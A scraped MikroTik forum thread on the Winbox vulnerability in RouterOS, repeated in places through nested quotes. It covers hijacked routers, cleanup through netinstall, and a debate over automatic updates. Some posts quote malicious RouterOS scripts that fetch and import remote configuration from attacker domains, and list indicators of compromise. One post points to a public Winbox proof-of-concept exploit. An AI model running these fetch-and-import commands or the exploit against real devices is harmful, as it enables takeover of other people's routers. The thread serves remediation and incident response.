Your firewall should not allow people to access your router.As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
Okay, so only people that have username and password can exploit the vulnerability? Or all people can access with vulnerability root even if you have not username and password for the routerboard?Your firewall should not allow people to access your router.As for who does not have the user and password of the Routerboard Expecific, is there the possibility of access in root mode and exploit this vulnerability?
If you have updated RouterOS, nobody can exploit this vulnerability.
Thank's!Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
Automatic security upgrades can ONLY be implemented, if they can be disabled. Opt-out MUST be possible.We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.I don't agree with "automatic update" we already have too many problems with windows 10 (like the last update that erased a lot of data?) we don't want that with mikrotik, i need to trust my rigs, I know I trust mikrotik as it is now.
Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.
What's the way out again?
Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router's NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring ... but be careful not to copy any configuration bit for which you're not sure why it's there.Hi All,If the attacker scans your ports, he will find the new port number too. Upgrade anyway!
I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.
What's the way out again?
Before loading exported configuration do inspect it in case it contains something suspicious.Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
Sure! i will check it well.Before loading exported configuration do inspect it in case it contains something suspicious.Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.
I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs
yes, i saw it. what does that mean? ssh or telnet connection via winbox?I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?
if we say winbox connection is ssh, why i see this in my logs
After you've connected with Winbox, and then click on "New Terminal", you'll see user logged in via telnet messages.
Thanks for the link.Cassio, please read the blog entry that was linked in first post. It answers all your questions and more;
https://blog.mikrotik.com/security/winb ... ility.html
if your user account has been disabled, then Netinstall is the only option.hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too...; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?
If it is old RouterOS and you get "bad password" it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!
add name=ip owner=admin policy=\
reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=5bc24d5c0d21bf27&actio\
n=upload&sncode=EBD7A5565C5BA8CA22063E65F05533F2&dynamic=static\") keep-res\
ult=no}"
Look to see if you have any scripts, files, usernames, PPP secrets or scheduled jobs from the IOCs at the end of this article; if so, delete them. Start with scheduler as these tasks could be re-run, leading to re-configuration of the router again.
Disable web proxy, and SOCKS (if you don’t need them, or check their configuration otherwise), and check the firewall rules.
In the tools menu, check the packet sniffer.
If you don’t use PPTP server functionality, turn if off.
Check all user accounts, remove all suspicious ones, and set a strong password for the rest of them.
Now UPDATE THE FIRMWARE of the router to the latest version.
:do {/tool fetch url="http://meaghan.pythonanywhere.com/" dst-path=tmp} on-error={:put "get http error"};
/import tmp;
/file remove tmp;
domains:
gazanew.com
mining711.com
srcip.com
src-ips.com
srcips.com
hostingcloud.science
meaghan.pythonanywhere.com
scheduled jobs names:
DDNS
CrtDDNS
UpDDNS
Setschedule[1-9]_
upd[113-116]
system[111-114]
ip
a
u[3-6]
User accounts known to be connected with campaigns:
toto
dodo
files on router:
i113.rsc
i114.rsc
I116.rsc
exsvc.rsc
hello I do not abloi well English, I want to know who can help me connect my sxt lite 5 station mode to an ap that a pirate clone the mac, I had it resolved by connect list, but the pirate cloned the mac and I can not connect ,please helpSeems that it is no longer functional, as I tried it, and did not see anything similar to a script. I think the domains have expired or have been seized.
Read this article here about more details on all this issue:
https://blog.avast.com/mikrotik-routers ... aign-avast
Credentials leaked in the past using some older, now closed, vulnerability could have been used to access the device if remote access to a management service (winbox, ssh, https) was still possible from outside (via the WAN interface).I am still wondering how this could happened.
Noobs will scream when their router randomly restart (because it was just applying updates during their gameplay)... noobs won't and will be secured.
Tools -> Traffic Monitor "If there's no traffic for the last 5 minutes - it's okay to upgrade" xDNoobs will scream when their router randomly restart (because it was just applying updates during their gameplay)
But they will stop complaining about the feature missing! xD= never
How cute. We all know that there is only one way for this to be done correctly.But they will stop complaining about the feature missing! xD= never :DTools -> Traffic Monitor :) "If there's no traffic for the last 5 minutes - it's okay to upgrade" xDNoobs will scream when their router randomly restart (because it was just applying updates during their gameplay)
I'd say that this is already done in v7 alpha as it's the easy part. I bet that showstopper is implementation of letsencrypt certificate autoupdate.We are working on that for v7
This appeared on my radar screen THIS AM with the moniker of UFO ... NORAD sent 3 F18 jets to try and intercept but failed to catch the phantom OS.We are working on that for v7
So sorry but I could not just contain myself Not that I'm missing V7 I just follow the forumNo, major misunderstanding
Not "it will be fixed in v7", but "It can only be fixed in v7".
viewtopic.php?t=93106#p467540We will release a beta, when it will exist. Currently v7 is in alpha stage, many functions are not completed and non functional. Beta needs at least all functions to be somewhat operational.
Alpha means "internal testing".
When we will have "public testing" (meaning Beta), we will announce it here.
Sure it is: 127.0.0.1Is it in ipv4 address space?
Hi, I have regular unwanted visitors on my IP and it come so far that now I can not use Netinstall , Routerboards RB962 and many others saying after "visit" factory boot loader 3.41, current boot loader 3.41 , upgrade boot loader 3.41. If Netinsatll can not be used than how to format NAND disk?Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.
Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
RouterBOOT has nothing to do with the issue.Hi, I have regular unwanted visitors on my IP and it come so far that now I can not use Netinstall , Routerboards RB962 and many others saying after "visit" factory boot loader 3.41, current boot loader 3.41 , upgrade boot loader 3.41. If Netinsatll can not be used than how to format NAND disk?Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.
Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
I faced also with this hijacking problem (u113.rsc, and so on), and it seems, that the router's firmware overwritten with an old one... Router model: 2011UiAS, current RouterOS: 6.39.2. In the System --> Routerboard menu I see: factory firmware 3.41 and upgrade firmware 3.33. I made a factory default reset, uploaded the newest package for upgrade the router OS (routeros-mipsbe-6.47.7.npk), but after restart nothing happens. The version remains on 6.39.2, no failure message in log. If I try to update the firmware in CL, the following failure message coming: ERROR: can not change firmware to this version, please try newer one. How can I made an update? The router working in a 0-24 patrol station, so it's difficult to stop and made with Netinstall :(RouterBOOT has nothing to do with the issue.Hi, I have regular unwanted visitors on my IP and it come so far that now I can not use Netinstall , Routerboards RB962 and many others saying after "visit" factory boot loader 3.41, current boot loader 3.41 , upgrade boot loader 3.41. If Netinsatll can not be used than how to format NAND disk?Not highly likely, but technically possible, although have not seen an example "in the wild". There are published methods how to do that, but from what you posted, those are the "regular" hacks.
Netinstall is always the safest choice, but 90% chance that deleting all this stuff + upgrade + new password will resolve your current issue.
Check "Sytem -> Packages" menu, there is a button, check for updates.